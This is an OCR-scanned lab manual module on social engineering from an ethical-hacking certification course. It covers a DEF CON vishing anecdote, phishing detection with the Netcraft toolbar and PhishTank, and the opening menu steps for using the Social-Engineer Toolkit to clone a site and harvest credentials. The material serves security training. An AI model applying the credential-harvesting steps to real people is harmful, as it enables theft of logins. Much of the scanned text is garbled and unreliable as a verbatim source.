Ceh v8 labs module 09 social engineering

CEH Lab Manual

S o c ia l E n g in e e r in g
M o d u le

0 9

M odule 09 - S o c ia l Engineering

Social Engineering
S o c ia l en g in eerin g is th e a r t o f co n vin cin g p eo p le to re v e a l c o n fid e n tia l in fo n m tio n .
ICON

KEY

/ V a lu a b le
in f o r m a tio n

^

Test your

L a b

S c e n a r io

Source: http:/ / monev.cnn.com/2012/08/O‫/־־‬technology‫/־‬walmart-liackde Icon/index, htm
Social engineering is essentially the art of gaining access to buildings, systems,
by exploiting human psychology, rather than by breaking 111 01‫ ־‬using
technical hacking techniques. The term “social engineering” can also mean an
attempt to gain access to information, primarily through misrepresentation, and
often relies 011 the trusting nature of most individuals. For example, instead of
trying to find software vulnerability, a social engineer might call an employee
and pose as an IT support person, trying to tiick the employee into divulging
111s password.
01‫ ־‬data

*5

W eb exercise

£ Q W orkbook revie

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee
into giving 111111 information that could be used 111 a hacker attack to win a
coveted “black badge” 111 the “social engineering” contest at the Deleon
hackers’ conference 111 Las Vegas.
1 1 tins year's Capture the Flag social engineering contest at Defcon, champion
1
Shane MacDougall used lying, a lucrative (albeit bogus) government contract,
and 111s talent for self-effacing small talk to squeeze the following information
out of Wal-Mart:
■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-services provider
■ Its employee pay cycle
■ Its staff shift schedule
■ The time managers take then‫ ־‬breaks
■ Where they usually go for lunch
■ Type of PC used by the manager
■ Make and version numbers of the computer's operating system, and
■ Its web browser and antivirus software
Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken 111
to the extent of coughing up so much scam-worthy treasure.
Calling from 111s sound-proofed booth at Defcon MacDougall placed an
“urgent” call, broadcast to the entire Deleon audience, to a Wal-Mart store
manager 111 Canada, introducing liinisell as "Gan‫ ־‬Darnell" from Wal-Mart's
home office 111 Bentonville, Ark.

C E H Lab Manual Page 675

Ethical Hacking and Countenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]


The role-playing visher (visliing being phone-based phishing) told the manager
that Wal-Mart was looking at the possibility of winning a multimillion-dollar
government contract.
“Darnell'’ said that 111 job was to visit a few Wal-Mart stores that had been
s
chosen as potential pilot locations.
But first, he told the store manager, he needed a thorough picture of how the
store operated.
1 1 the conversation, which lasted about 10 minutes, “Darnell” described
1
himself as a newly lured manager of government logistics.
He also spoke offhand about the contract: “All I know is Wal-Mart can make a
ton of cash off it,” he said, then went on to talk about his upcoming visit,
keeping up a “steady patter” about the project and life 111 Bentonville, Crowley
writes.
As if tins wasn't bad enough, MacDougall/Darnell directed the manager to an
external site to fill out a survey 111 preparation for 111s upcoming visit.
The compliant manager obliged, plugging the address into 111s browser.
When his computer blocked the connection, MacDougall didn't miss a beat,
telling the manager that he'd call the IT department and get the site unlocked.
After ending the call, stepping out of the booth and accepting 111s well-earned
applause, MacDougall became the first Capture the Flag champion to capture
even‫ ״‬data point, or flag, on the competition checklist 111 the three years it has
been held at Defcon. Defcon gives contestants two weeks to research their
targets. Touchy information such as social security numbers and credit card
numbers are verboten, given that Defcon has no great desire to bring the law
down on its head.
Defcon also keeps its nose clean by abstaining from recording the calls, which
is against Nevada law. However, there's no law against broadcasting calls live to
an audience, which makes it legal for the Defcon audience to have listened as
]MacDougall pulled down Wal-Mart's pants.
MacDougall said, “Companies are way more aware about their security. They’ve
got firewalls, intrusion detection, log-in systems going into place, so it’s a lot
harder for a hacker to break 111 these days, or to at least break in undetected. So
a bunch of hackers now are going to the weakest link, and the link that
companies just aren’t protecting, which is the people.”
MacDougall also shared few best practices to be followed to avoid falling victim
to a social engineer:
■ Never be afraid to say no. If something feels wrong, something is
wrong
■ An IT department should never be calling asking about operating
systems, machines, passwords or email systems—they already know


Ethical Hacking and Countermeasures Copyright © by EC-Council


■ Set up an internal company security word of the day and don’t give any
information to anyone who doesn’t know it
■ Keep tabs 011 what’s 011 the web. Companies inadvertently release tons
of information online, including through employees’ social media sites
As an expert e t h i c a l h a c k e r and p e n e t r a t i o n t e s t e r , you should circulate the
best practices to be followed among the employees.
& T o o ls
d e m o n s tr a t e d in
t h i s la b a r e
a v a ila b le in
D:CEHT o o lsC E H v 8
M o d u le 09 S o c ia l
E n g in e e rin g

L a b

O

b je c t iv e s

The objective of this lab is to:
■ Detect phishing sites
■ Protect the network from phishing attacks
To earn* out diis lab, you need:
■ A computer nuuiing Window Seiver 2012
■ A web browser with Internet access
L a b

D u r a t io n

Time: 20 Minutes
O
»

T A S K

v e r v ie w


1

O v e rv ie w

Social engineering is die art of convincing people to reveal confidential information.
Social engineers depend 011 the fact that people are aware of certain valuable
information and are careless 111 protecting it.
L a b

T a s k s

Recommended labs to assist you 111 social engineering:
■ Social engineering
■ Detecting plusliuig using Netcraft
■ Detecting phishing using PliishTank
L a b

A n a ly s is

Analyze and document the results related to the lab exercise. Give your opinion 011
your target’s security posture and exposure.

P LE A S E


TA LK

TO

Y O U R IN S T R U C T O R IF Y O U
R E L A T E D TO T H IS LAB.

H A V E

Q U E ST IO N S

Ethical Hacking and Countemieasures Copyright © by EC-Council


Delecting Phishing Using Netcraft
N e trm ftp ro v id e s n ‫׳‬eb se rve r a n d n ‫׳‬eb h o stin g w a rk e t- sh a re a n a ly s is , in c lu d in g n ' b
e
se rve r a n d o p eratin g system d etectio n .
ICON

KEY

L a b

Valuable /
information

By now you are familiar with how social engineering is performed and what sort
ot information can be gathered by a social engineer.

.‫״*־‬v Test vour

*a

W eb exercise

f f i! W orkbook revi!

S c e n a r io

Phishing is an example of a social engineering technique used to deceive users,
and it exploits the poor usability of current web security technologies.
Phishing is the act of attempting to acquire information such as user names,
passwords, and credit card details (and sometimes, indirectly, money) by
masquerading as a trustworthy entity 111 an electronic communication.
Communications claiming to be from popular social websites, auction sites,
online payment processors, 01‫ ־‬IT administrators are commonly used to lure the
unsuspecting public. Phishing emails may contain links to websites that are
infected with malware. Phishing is typically carried out by email spoofing 01‫־‬
instant messaging and it often directs users to enter details at a fake website
whose look and feel is almost identical to the legitimate one.
Phishers are targeting the customers of banks and online payment services.
They send messages to the bank customers by manipulating URLs and website
forgerT The messages sent claim to be from a bank and they look legitimate;
.
users, not realizing that it is a fake website, provide their personal information
and bank details. Not all phishing attacks require a fake website; messages that
claim to be from a bank tell users to dial a phone number regarding problems
with their bank accounts. Once the phone number (owned by the plusher, and
provided by a Voice over IP service) is dialed, it prompts users to enter their
account numbers and PIN. Vishing (voice phishing) sometimes uses fake callerID data to give the appearance that calls come from a trusted organization.
Since you are an expert e t h i c a l h a c k e r and p e n e t r a t i o n t e s t e r , you must be
aware of phishing attacks occurring 011 the network and implement antiphishing measures. 111 an organization, proper training must be provided to
people to deal with phishing attacks. 111 this lab you will be learning to detect
phishing using Netcraft.




L a b

O

b je c t iv e s

Tins kb will show you phishing sites using a web browser and show you how to
use them. It will teach you how to:
■ Protect the network from phishing attack
To carry out tins lab you need:

^ ~ T o o ls

t h i s la b a r e
a v a ila b le in

■

N e t c r a f t is located at D :C E H -T o o lsC E H v 8 M o d u le 09 S o c ia l
E n g in e e r in g A n ti- P h is h in g T o o lb a r N e tc r a f t T o o lb a r

■ You can also download the latest version of
link http://toolbar.netcralt.com/

E n g in e e rin g

■

If you decide to download the
the lab might differ

N e t c r a f t T o o lb a r

l a t e s t v e rs io n ,

from the

then screenshots shown

111

■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet explorer, etc.) with Internet access
■ Administrative privileges to run the Netcraft toolbar
L a b

D u r a t io n

Time: 10 Minutes
O

v e r v ie w

o f

N

e t c r a f t T o o lb a r

Netcraft Toolbar provides I n t e r n e t s e c u r ity s e r v ic e s , including anti-fraud and
anti-phishing services, a p p lic a tio n t e s ti n g , code reviews, automated penetration
testing, and r e s e a r c h d a t a a n d a n a ly s is on many aspects of the Internet.
L a b
^

T A S K

1

A n ti-P h ish in g T oo l
bar


T a s k s

1. To start this lab, you need to launch a web browser first. 1 1 this lab we
1
have used M o z illa F ire fo x .
2. Launch the S t a r t menu by hovering the mouse cursor on the lower-left
corner of the desktop.



JL
‫״‬
5
Q = JY ou cau also
download the Netcraft
toolbar form
http://toolbar. etcraft.com

11

* | Windows Server 2012
! m i 2012R Icak CanJiaatr D
c
ot*c«nvtiftlmHon copy BwO M
W

F IG U R E 1.1: Windows Server 2012-Start Menu

3. Click the

M o z illa F ir e f o x

app to launch the browser.

F IG U R E 1.2: Windows Server 2012-Start Menu Apps view

4. To download the N e t c r a f t T o o lb a r for M o z illa F ir e fo x , enter
h ttp :// toolbar.11etcraft.com 111 the address bar of the browser or drag
and drop the n e t c r a f t _ t o o l b a r - 1. 7-fx .x p i file 111 Firefox.
5. 1 1 tins lab, we are downloading the toolbar from the Internet.
1
6. 1 1 Firefox browser, click
1
the add-on.
Netcraft provides
Internet security services,
including anti-fraud and
anti-phishing services.

^

D o w n lo a d t h e N e t c r a f t T o o lb a r

to install as

‫ןזח‬
‫ת‬

etc M i f t

SIN G LE H 3 P

■n
‫ן‬

, ,

M»tc‫»-׳‬ft Toolbar

‫• ■׳‬

Why u tt ‫ •יש‬N«tcraft Toolbar?
U Protect your taviitQf fromI'hM
htnq attack*,

a s ethe hoittnq totat)or1and HfcMataiq 0 e
e
te
1<
O Hlp
e defend tt*c Internet commu‫«׳‬ltytrooi Ira

F IG U R E 1.3: Netcraft toolbar downloading Page




7. On the
im a g e

I n s ta ll page of the Netcraft Toolbar site, click the
to continue with installation.

fc 4

c

P ftO l

1

nETCI^AFT
‫■(., ־ » ״‬
.

F ir e fo x

D ow nload Now
Netcraft Anti Phithing Toolbar

&

[QQ Netcraft is an
Internet services company
based in Bath, England.

System Raqulramanla

F IG U R E 1.4: Netcraft toolbar Installation Page

8. Click A llo w to download Netcraft Toolbar.
^

a■*«.ne<r<ft<omId<ti
t1c
0 )

‫ סי*ז‬ye.e‫׳‬t* th
»« d «

SNGLEH2r

1 -‫1■ -־‬
Teotbir

D ow nload Now
N*te«H Antl-PN«hl0<Todhtr
‫׳‬

r=
rs

a

Systam Kaquirtmanti

'oolba• <uppor‫׳‬

> a l« # (AMnn/HMnji)
r>*p tfc rre
« cwitnn rv > < > 1cnsorthe tootta r«r ar» orte b w t« 1 nxdrg ««>« tu w « ooea. andvaran
a « e$
Help & Support
ro o •in t«llin ? fm• ••id‫־‬tr ...l.ll.l.‫״־‬
Mm a Q
« a h i 8 1 0 tu fw < uw1« tog«t t*em«t oa tf »• 1
lso a»» rt«t «n » to is yo
wanrttoofcx

F IG U R E 1.5: Netcraft toolbar Installation-Allow button

9. When the

S o ftw a r e In s ta lla tio n

dialog box appears, click I n s ta ll

N ow .

Software Installation
Install add-ons only from authors w ho m you trust.
Malicious software can damage your computer or violate your privacy.

You have asked to install the following item:
Netcraft Anti-Phishing Toolbar (Netcraft Ltd)

£ Q Netcraft Toolbar
provides a wealth o f
information about the sites
you visit.

http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi

Install Now

Cancel

F IG U R E 1.6: Installing Netcraft Toolbar

10. To complete the installation it will ask you to restart the browser. Click
R e s ta r t N ow .




.

l _ Risk Rating displays the
_
trustworthiness of die current

■A < n t(ifT
• o o cntt/ K
H• p & Support
• l*
1gUHnIm
lnilM 1 «w ■ • iui InilaMu• *Mr
iu1 ‫׳‬l‫׳‬
■I
‫ י‬Ao jlec h v« jM
1
laclKM iito ijit tfyo •it « with* non < t0 9 M M toabJt
x/
u
0
u 1 ‫•י‬
•o«t 1 Oimmh'it >< M «n w r«dn air M h O
nv
14
tU M ir
(juM tm
O

F IG U R E 1.7: Restarting Firefox browser

11.

N e t c r a f t T o o lb a r is now visible. Once the T o o lb a r is installed, it looks
similar to the following figure.
p
U----

>«rw •t

SatejtfuaitontiltiOflC1 1
*1

1

*

‫-ם‬

J

F IG U R E 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. When you visit a site, the following information displays 111 the Toolbar
(unless the page has been blocked): R is k r a t in g , R a n k , and F la g .
13. Click S it e

R e p o rt

to show the report of the site.

0=5! Site report links to :
detailed report for die

F IG U R E 1.9: Report generated by Netcraft Toolbar

14. If you attempt to visit a page that has been identified as a pliishing page
by Netcraft Toolbar you will see a w a r n in g d ia lo g that looks similar to
the one in the following figure.
15. Type, as an example:
http: / / www.pavpal.ca.6551 .secure7c.mx / images / cgi.bin




£ 0 . Phishing a site feeds
continuously updated
encrypted database of
patterns diat match phishing
URLs reported by the
Netcraft Toolbar.

F IG U R E 1.10: Warning dialog for blocked site

16. If you trust that page click Y e s to open it and if you don’t, click N o
( R e c o m m e n d e d ) to block that page.
17. If you click N o the following page will be displayed.
4‫א‬

Kl
ln

c

Co
of
b

fi ft C
-

.■!‫ ■ר‬P K n S Hccl
! !• ! h Mg *o lokx
!
%lll t»
‫־‬
... -m;.
:

L

■
F IG U R E 1.11: Web page blocked by N etcraft Toolbar

L a b

A n a ly s is

Document all die results and report gathered during die lab.
Tool/Utility

Information Collected/Objectives Achieved

Netcraft

P LE A S E

Q

TA LK

■ Phishing site detected

TO


H A V E

Q U E ST IO N S

u e s t io n s

1. Evaluate whether the Netcraft Toolbar works if you use a transparent
proxy.



2. Determine it you can make the Netcraft Toolbar coexist on the same
line as other toolbars. If so, how?
3. How can you stop the Toolbar warning if a site is trusted?
Internet Connection Required
□ N<
Platform Supported
0 Classroom


□ !Labs



3
Detecting Phishing Using
PhishTank
P h is h T a n k is a c o lla b o ra tiv e clearin g h o u se fo r d a ta a n d in fo rm a tio n reg ard in g
p h is h in g on th e In te rn e t.
ICON

KEY

Valuable
_____ information
.‫* ־‬
>

Test yo u r

gfe W eb exercise
W orkbook r‫׳‬e‫־‬

L a b

S c e n a r io

Phishing is an attempt by an individual 01‫ ־‬group to solicit personal information
from unsuspecting users by employing social engineering techniques. Phishing
emails are crafted to appear as if they have been sent from a legitimate
organization 01‫ ־‬known individual. These emails often attempt to entice users to
click 011 a link that will take the user to a fraudulent website that appears
legitimate. Hie user then may be asked to provide personal information such as
account user names and passwords that can further expose them to future
compromises. Additionally, these fraudulent websites may contain malicious
code.
With the tremendous increase 111 the use of online banking, online share trading,
and ecommerce, there has been a corresponding growth 111 the incidents of
phishing being used to carry out financial frauds. Phisliing involves fraudulently
acquiring sensitive information (e.g. passwords, credit card details etc.) by
masquerading as a masted entity.
111 the previous lab you have already seen how a phishing site can be detected
using the Netcraft tool.

The usual scenario is that the victim receives an email that appears to have been
sent from 111s bank. The email urges the victim to click 011 the link 111 the email.
When the victim does so, he is taken to “a secure page 011 the bank’s website.”
The victim believes the web page to be authentic and he enters 11 s user name,
1
password, and other information. 111 reality, the website is a fake and the
victim’s information is stolen and misused.
Being an administrator 01‫ ־‬penetration tester, you might implement all the most
sophisticated and expensive technology solutions 111 the world; all of it can be
bypassed if your employees fall for simple social engineering scams. It become




your responsibility to educate employees
information.

011

best practices for protecting

Phishing sites 01‫ ־‬emails can be reported to plusl11ng-report@us-cert.gov
http: / / www.us-cert.gov/ 11av/report ph 1sh111g.html
US-CERT (United States Computer Emergency Readiness Team) is collecting
phishing email messages and website locations so that they can help people
avoid becoming victims of phishing scams.
[C T T ools
th i s la b a r e
a v a ila b le in
D:CEHT oo lsC E H v 8
E n g in e e rin g

L a b

O

b je c t iv e s

This lab will show you how to use phishing sites using a web browser. It will
teach you how to:
■ Protect the network from phishing attacks
L a b

E n v ir o n m

e n t

To carry out the lab you need:
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access
L a b

D u r a t io n

Tune: 10 Minutes
O
£ Q PhishTank U R L:
http.//www.phishtank.com

v e r v ie w

T A S K

P h is k T a n k

PhishTank is a f r e e c o m m u n ity s i t e where anyone can submit, verity, track, and
s!1are p h is h in g d a ta . PhishTank is a collaborative clearing house for data and
information regarding phishing 011 the Internet. Also, PhishTank provides an o p e n
API tor developers and researchers to integrate anti-phishing data into their
applications at 110 charge.
L a b

m.

o f

1

P h is h T a n k


T a s k s

1. To start this lab you need to launch a web browser first. 1 1 this lab we
1
have used M o z illa F ire fo x .
2. Launch the S t a r t menu by hovering the mouse cursor
corner of desktop.

011

the lower-left



jw
$

23 Windows Server 2012
W
ndow icrrct 2 1 IUIe.mC vl!u 0*t»c«n*
a
02
«> atr
kialualoncop H MW‫׳‬
y u!a

- g •*fa
F IG U R E 2.1: Windows Server 2012-Start Menu

3. Click the

M o z illa F ir e f o x

app to launch the browser.

£01 PlushTaiik provides an
open A P I for developers and
researchers to integrate antiphishing data into dieir
applications at no charge.

F IG U R E 2.2: Windows Server 2012-Start Menu Apps view

4. Type h tt p :/ /w w w .p h is h ta n k .c o m
and press E n te r.

111 the

address bar of the web browser

5. You will see the follow‫־‬
‫ ׳‬ing

PhishTank

‫.. י . ״ ״ ־‬

Jo in tie fiylitayaiittt ptiialiiiKj

S to rts p g p sh s Track th Uatis oy usuhmfyaons
u m ts sd d h e
e
f or
Develop s ftwr w o rfr eAPI.
o ae ith u e

Verfy

<cje'sbatn
Arsnumo.

a

R Su n rs
ecert b issb
17 S
S:£1

rtn«r»niTKrsfjnn.’iTVMt/ieya'AijaaaJ
e

lPiOO

^*®:/VrstM
.axVsy
*rt>-r
tom

lg liia

rtc usemncs.aebfu.ictscmnsraurAxroim

m
.cvn’PM lct.K i
/iM n

F IG U R E 2.3: Welcome screen o f PhishTank




1

PliishTauk s operated
by Open D N S to improve
the Internet through safer,
faster, and smarter D N S.

6. Type the w e b s i t e URL to be checked for phishing, for example,
http: / / sdapld21.host21.com.
7. Click I s

it a p h is h ? .

Jo in the fight against phishing
Submrt tu w c » d phsftua. ‫־‬
Rack the ttatic of 1cur submissions
/
Vecfyoher jscts suonssnns Develop software wim our ftee API.

r //KiJptaV.ItMtUcem
ttp

j

R#c*r< SubTKSors

>ftLIm »u»p«>.le0pirn
mm
i

*MhTink provttet »‫ ׳‬oh‫ ״‬An tar

■d )fjst) lu
im

'

ImiTVl. J C Y
4 IU ...

F IG U R E 2.4: Checking for site

If the site is a p h is h in g

PhishTank

s ite ,

you see the following warning dialog box.

O of it* NM.i«o*MTw*
k

Submission #1571567 is aimentty ONLINE

0 2 Open D N S is
interested in having die
best available information
about phishing websites.

S01 n or Hcgcto‫ ׳‬tovert, t !6 sutxnssior.

No screenshot yet
We have not ye! successfully taken
a screeasltol •f the submitted website.

F IG U R E 2.5: Warning dialog for phishing site

L a b

A n a ly s is

Document all die websites and verify whether diey are phishing sites.
Tool/Utility
PhiskTank


Information Collected/Objectives Achieved
■ Phishing site detected



PLE A SE

Q

TA LK

TO


H A V E

Q U E ST IO N S

u e s t io n s

1. Evaluate what PhishTank wants to hear about spam.
2. Does PhishTank protect you from phishing?
3. Why is Open DNS blocking a phish site that PhishTank doesn't list or
has not vet verified?
Internet Connection Required

0 Yes

□ No

Platform Supported
0 Classroom


□ !Labs



3
Social Engineering Penetration
Testing using Social Engineering
Toolkit (SET)
T h e S o c ia / E n g in e e r T o o / k it (S E T ) is a n open-source P yth o n - d rive n to o l aim e d a t
‫־‬
p e n e tra tio n te stin g a ro u n d s o c ia l en g in eerin g

■c o n

L a b

k e y

£__ Valuable
information

s

S c e n a r io

Social engineering is an ever-growing threat to organizations all over the world.
Social engineering attacks are used to compromise companies even‫ ־‬day. Even
though there are many hacking tools available with underground hacking
communities, a social engineering toolkit is a boon for attackers as it is freely
available to use to perform spear-pliishing attacks, website attacks, etc.
Attackers can draft email messages and attach malicious files and send them to
a large number of people using the spear-pliishing attack method. Also, the
multi-attack method allows utilization of the Java applet, Metasploit browser,
Credential Harvester/ Tabnabbing, etc. all at once.

Test your
knowledge
W eb exercise

m

W orkbook review

Though numerous sorts ot attacks can be performed using tins toolkit, tins is
also a must-liave tool for a penetration tester to check for vulnerabilities. SET is
the standard for social-engineering penetration tests and is supported heavily
witlun the security community.
As an e t h i c a l h a c k e r , penetration tester, or s e c u r i t y a d m i n i s t r a t o r you
should be extremely familiar with the Social Engineering Toolkit to perform
various tests for vulnerabilities 011 the network.
L a b

O

b je c t iv e s

The objective of tins lab is to help sUidents learn to:
■ Clone a website
■ Obtain user names and passwords using the Credential Harvester
method
■ Generate reports for conducted penetration tests



& T o o ls
t h i s la b a r e
a v a ila b le in
E n g in e e rin g

L a b

E n v ir o n m

e n t

To earn’ out die kb, you need:
■ Run this tool 111 B a c k T r a c k Virtual Machine
■ Web browser with Internet access
■ Administrative privileges to mn tools

L a b

D u r a t io n

Tune: 10 Minutes
O

v e r v ie w

o f


T o o lk it

Sockl-Enguieer Toolkit is an open-source Python-driven tool aimed at penetration
testing around Social-Engineering. The (SET) is specifically designed to perform
advanced attacks against die human element. The attacks built into die toolkit are
designed to be targeted and focused attacks against a person or organization used
during a penetration test.
L a b

T a s k s

1. Log in to your B a c k T r a c k virtual machine.
T A S K

1

E x e c u te S o c ia l
E n g in e e rin g
T o o lk it

2. Select A p p lic a t io n s

‫ ^־־‬B a c k T r a c k ‫ ^־־‬E x p lo ita tio n T o o ls ‫ ^־־‬S o c ia l

E n g in e e r in g T o o ls ‫ ^־־‬S o c ia l E n g in e e r in g T o o lk it
^ Applications[ Places System [>7]

3

|Q In rmtio G th rin
^ fo a n a e g
r■ v ln ra ilityA s s mn
u e b ses e t
J 0 E p ita nT o
x lo tio o ls
P g E c la n
rivile e s a tio
Ef Min in gA c s
a ta in c e s
^ R v rs E g e rin
e e e n in e g
I R ID O ls
F To
O

.-f * Network Exploitanor Tools
Web Exploitation Tools

D ta a eE p ita nT o ^
a b s x lo tio o ls
Wireless Exploitation Tools
Social E’ jifM 9 |
Physical Exploitation
‫י‬Open Source Exp loited ,h set 3

Forensic!*

and click S e t.

Tue Sep 25. 7:10 PM

a
9

BEEF XSS Framework

9

HoneyPots

11• Social Engineering Toolkit

KCporting Tools
( P services
y

Miscellaneous

<< back track

F IG U R E 3.1: Launching S E T in BackTrack




3.
f f is E T has been
presented at large-scale
conferences including
Blackhat, DerbyCon,
Defcon, and ShmooCon.

A T e r m in a l window for SET will appear. Type
agree to the terms of service.

y

and press

E n te r

to

File Edit V iew Term inal Help
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH

DAMAGE.

The above li c e n s i n g was ta k e n fro m th e BSD lic e n s i n g a n d ^ is a p p lie d t o S o c ia l-E n
g in e e r T o o l k i t as w e l l .
___
" * ^ 1
N ote t h a t th e S o c ia l- E n g in e e r T o o l k i t i s p r o v id e d as i s , and i s
p e n -s o u rc e a p p lic a t i o n .
M r

3

r o y a lt y f r e e

0

F e e l f r e e t o m o d ify , u s e , c han ge, m a rk e t, do w h a te v e r § u w a n t w i t h i t a f lo n g a
s you g iv e th e a p p r o p r ia te c r e d i t w here c r e d i t
i s due (w h ic h means g i v in g th e a u th o r s th e c r e d i t t h e y ife s e r v e f o r w r i t i n g i t ) .
A ls o n o te t h a t by u s in g t h i s s o f tw a r e , i f you e v e r
see th e c r e a t o r o f SET i n a b a r , you a re r e q u ir e d t o g iv e him a hug and buy
him
a b e e r. Hug m ust l a s t a t le a s t 5 s e c o n d s . A u th o r
h o ld s th e r i g f t t t o re fip s e th e hug o r th e b e e r . ■
f
| ‫ן‬
^

£ Q ‫׳‬The web jacking attack
is performed by replacing
the victim ’s browser with
another window that is
made to look and appear to
be a legitimate site.

T ^ ^ * c M 1- E t l^ e e r T A lk it W s r y T ig f lf ijp y e ly
good pn<r f l o t ' B k i l . I f y o u a r e
J t a ^ op I ^ S 4a t h * t o o l f o f l rcaj f c j B u ^ p u r J ^ e t h a r ^ r c
1

n W c r a t h O T f t f l b ^ t h e l: o m p a n y * y m j a r e ^ r e r f O T ll™ a ^ e s s « e r r ^
J ‫׳‬ou a r e v i o l a t
in g t h e te rm s o f s e r v i e and li c e n s e o f t h i s t o o l s e t . B^ r t tin q X
yes ( o n ly one t im e ) , you a g re e t o th e te rm s o f s e r v ic e a n d T n a t y o u w i l l o n ly us
e t h i s t o o l f o r l a w f u l p u rp o s e s o n ly .

F IG U R E 3.2: S E T Service Agreement option

4.

You will be presented will a list of menus to select the task. Type 1 and
press E n te r to select the S o c ia l - E n g in e e r in g A t t a c k s option.
Homepage: h ttp s : / /w w w . t r u s t e d s e c . c o m

[

Welcome t o th e S o c ia l- E n g in e e r T o o l k i t ( S E T J j.Y o u r one
s to p shop f o r a l l o f y o u r s o c ia l- e n g in e e r in g n e e d s . ^ ,
J o in us on ir c . f r e e n o d e . n e t i n

c h a n n e l # s e « J o lk it

The Social-Engineer Toolkit is a product of TrustedSec.

f f is E T allows you to
specially craft email
messages and send them to
a large (or small) number of
people with attached file
format malicious payloads.

Visit: https://www.trusted5ec.com
S e le c t fro m th e menu:
J

1) S o c ia l- E n g in e e r in g A t ta c k s I
2) F a s t- T ra c k P e & t r a t io n T e s t in g
3 ‫ י‬T h ir d p .n rty M odules
4) U p date th e M e ta s p lo it S ra n e i/o rk
5 ) U p date th e S o c ia l- E n g in e e r T o o lk it
6 ) U pdate SET c o n f ig u r a t i o n
7) H e lp , C r e d it s , and A b out

_

99) E x i t t h e S o c ia l- E n g in e e r T o o lk it

F IG U R E 3.3: S E T Main menu

5.


A list of menus 111 Social-Enguieermg Attacks will appear; type 2 and
press E n te r to select W e b s i te A t t a c k V e c to r s .



« T e r m in a l
J o in us on ir c . f r e e n o d e . n e t i n

c h a n n e l # s e t o o lk 1 t

The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
C Q t i! e Social-Engineer
Toolkit "W eb Attack"
vector is a unique way of
utilizing multiple webbased attacks in order to
compromise the intended
victim.

S e le c t fro m th e menu:
1) S p e a r -P h is h in q A t ta c k Vec t o r s
| 2) W e b s ite A t ta c k V e c to r s |
3) I n f e c t io u s M edia G e n e ra to r
4 ) C re a te a P a y lo a d and L is t e n e r
_
5) Hass M a ile r A t ta c k
‫ן‬
I 6 ) A rd u in o -B a s e d A t t a c k v e c t o r g
| ^ % S M S S p o o fin g A tta c k V e c t o r ♦
8) W ir e le s s A c c e s s P o in t A t ta c k V e c to r
9 ) QRCode G e n e ra to r A t t a c | V e c to r
10) P o w e rs h e ll A t ta c k V e c t l r s
11) T h ir d P a r ty M odules

_

^

I A

99) R e tu rn b ack t o t h e m ain menu.

>r5s____________________________________________________
F IG U R E 3.4: Social Engineering Attacks menu

6. 1 1 the next set of menus that appears, type 3 and press
1
the C r e d e n tia l H a r v e s t e r A t ta c k M e th o d

E n te r

to select

File Edit View Term inal Help

0 3 Th e Credential
Harvester Method w ill
utilize web cloning o f a
website that has a username
and password field and
harvest all die information
posted to die website.

and th e B a c k |T ra c k team . T h is method u t i l i z e s !fr a m e re p la c e m e n ts t o
make th e h ig h li g h t e d URL l i n k t o a p p e a r l e g it im a t e how ever *tf 1en c lic k e d
a w indow pops up th e n i s re p la c e d w i t h th e m a lic io u s l i n k . You can e d i t
th e l i n k re p la c e m e n t s e t t i n g s i n th e s e t^ c o n F ig i f i t s to n fc * k o « /f a s t.

k

The M u lt i- A t t a c k method w i l l add a c o m b in a tio n o f a t ta c k s th ro u g h th e web a t t a c
Jr
menu. F o r exam ple you can u t i l i z e th e Java A p p le t , M e t a s p lo it B ro w s e r,
C r e d e n tia l H a rv e s te r/T a b n a b b in g , and th e Man L e f t i n th e M id d le a t t a c k
a l l a t once t o see w h ic h i s s u c c e s s f u l.
m.
1) Java A p p le t A t ta c k Method
2) M e ta s p lo it B row ser E x p lo i t Method
I 3) C r e d e n tia l H a rv e s te r A t ta c k Method |

4) Tabnabbing Attack Method
5)
6)
7)
8)
9)

Man l e f t i n t h e M id d le A t ta c k M ethod
Web J a c k in g A t ta c k Method
M u lt i- A t t a c k Web H e th o l
V ic t im Web P r o f i l e r
C re a te o r im p o r t a C o d e S ig n in g C e r t i f i c a t e

a c k

99) R e tu rn t o M ain Menu

U

s e t :w e b a tta c k j3 B 1

F IG U R E 3.5: website Attack Vectors menu

7. Now, type 2 and press
menu.


E n te r

to select the S i t e

C lo n e r

option from the



« T e r m in a l
9 ) C re a te o r im p o r t a C o d e S ig n in g

M

99) R e tu rn t o M ain Menu

C Q t 1 e Site Cloner is used
1
to done a website o f your
choice.

s e t : w e b a tta c k >3
The f i r s t m ethod w i l l a llo w SET t o im p o r t‫ *!' ׳‬l i s t o f p r e - d e f in e d web
a p p lic a t i o n s t h a t i t can u t i l i z e w i t h i n th e a t t a c k .
The second m ethod w i l l c o m p le te ly c lo n e a w e b s ite o f y o u r c h o o s in g
and a llo w you t o u t i l i z e th e a t t a c k v e c t o r s w i t h i n th e c o m p le te ly
same web a p p lic a t i o n you w e re a t te m p t in g t o c lo n e .
I h e t h i r d m ethod a U o w s y o u jt o im p o r t y o u r own w e b s ip ;, n o te t ^ a t you
S h o u ld o n ly have a lt' in d e x . h tm l when u s in g th e im p o r t W e b s ite

fu n c tio n a lity ^ ^ * Y jF
1) Web T e m p la te s
12) S i t e C lo n e r !
3) Custom Im p o rt

♦
v

I
I

^

IV

•) /

‫׳‬

‫י‬

^ 3 4

- ■
«‫״‬

99) R e tu rn t o W e b a tta c k Menu
;e t: w e b a tt a c k a E f| _______________

F IG U R E 3.6: Credential Harvester Attack menu

Type the

of your BackTrack virtual PC 111 the prompt lor IP
and press E n te r.
1 1 tins example, the IP is 10.0.0.15
1
IP a d d r e s s

a d d r e s s f o r t h e P O S T b a c k in H a r v e s t e r /T a b n a b b i n g

*

T e r m in a l


COS t 1e tabnabbing attack
1
mediod is used when a
victim has multiple tabs
